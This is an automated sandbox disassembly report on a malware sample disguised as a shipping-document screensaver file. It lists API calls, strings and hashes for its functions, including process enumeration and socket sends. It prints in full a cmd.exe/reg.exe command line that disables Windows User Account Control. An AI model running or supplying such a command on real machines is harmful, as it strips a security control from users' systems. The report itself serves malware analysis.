                                                      • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                      • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                      • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                      • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                      • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                      • String ID: `AG
                                                      • API String ID: 1958988193-3058481221
                                                      • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                      • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                      • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                      • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                      APIs
                                                      • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                      • GetLastError.KERNEL32 ref: 0041CA91
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                      • String ID: 0$MsgWindowClass
                                                      • API String ID: 2877667751-2410386613
                                                      • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                      • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                      • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                      • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                      APIs
                                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                      • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                      • CloseHandle.KERNEL32(?), ref: 00406A14
                                                      Strings
                                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                      • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$CreateProcess
                                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                      • API String ID: 2922976086-4183131282
                                                      • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                      • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                      • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                      • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                      • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                      • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                      • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                      • String ID: KeepAlive | Disabled
                                                      • API String ID: 2993684571-305739064
                                                      • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                      • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                      • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                      • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                      APIs
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                      • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                      • Sleep.KERNEL32(00002710), ref: 00419F79
                                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                                      • String ID: Alarm triggered
                                                      • API String ID: 614609389-2816303416
                                                      • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                      • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                      • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                      • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                      Strings
                                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                      • API String ID: 3024135584-2418719853
                                                      • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                      • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                      • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                      • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                      • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                      • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                      • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                      APIs
                                                        • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                      • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                      • String ID:
                                                      • API String ID: 3525466593-0
                                                      • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                      • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                      • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                      • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                      APIs
                                                        • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                        • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 4269425633-0
                                                      • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                      • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                      • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                      • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                      • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                      • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                      • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                      • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                      • __freea.LIBCMT ref: 0044FFC4
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                      • String ID:
                                                      • API String ID: 313313983-0
                                                      • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                      • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                      • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                      • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                      • _free.LIBCMT ref: 0044E1A0
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                      • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                      • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                      • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                      APIs
                                                      • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                      • _free.LIBCMT ref: 00446F7D
                                                      • _free.LIBCMT ref: 00446FA4
                                                      • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                      • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                      • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                      • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                      • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                      APIs
                                                      • _free.LIBCMT ref: 0044F7B5
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 0044F7C7
                                                      • _free.LIBCMT ref: 0044F7D9
                                                      • _free.LIBCMT ref: 0044F7EB
                                                      • _free.LIBCMT ref: 0044F7FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                      • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                      • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                      • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                      APIs
                                                      • _free.LIBCMT ref: 00443305
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 00443317
                                                      • _free.LIBCMT ref: 0044332A
                                                      • _free.LIBCMT ref: 0044333B
                                                      • _free.LIBCMT ref: 0044334C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                      • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                      • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                      • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                      APIs
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                      • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                      • IsWindowVisible.USER32(?), ref: 004167A1
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                        • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessWindow$Open$TextThreadVisible
                                                      • String ID: (FG
                                                      • API String ID: 3142014140-2273637114
                                                      • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                      • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                      • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                      • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                      APIs
                                                      • _strpbrk.LIBCMT ref: 0044D4A8
                                                      • _free.LIBCMT ref: 0044D5C5
                                                        • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                        • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                        • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                      • String ID: *?$.
                                                      • API String ID: 2812119850-3972193922
                                                      • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                      • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                      • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                      • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                      APIs
                                                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                        • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                        • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                        • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                      • String ID: XCG$`AG$>G
                                                      • API String ID: 2334542088-2372832151
                                                      • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                      • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                      • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                      • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000104), ref: 00442714
                                                      • _free.LIBCMT ref: 004427DF
                                                      • _free.LIBCMT ref: 004427E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
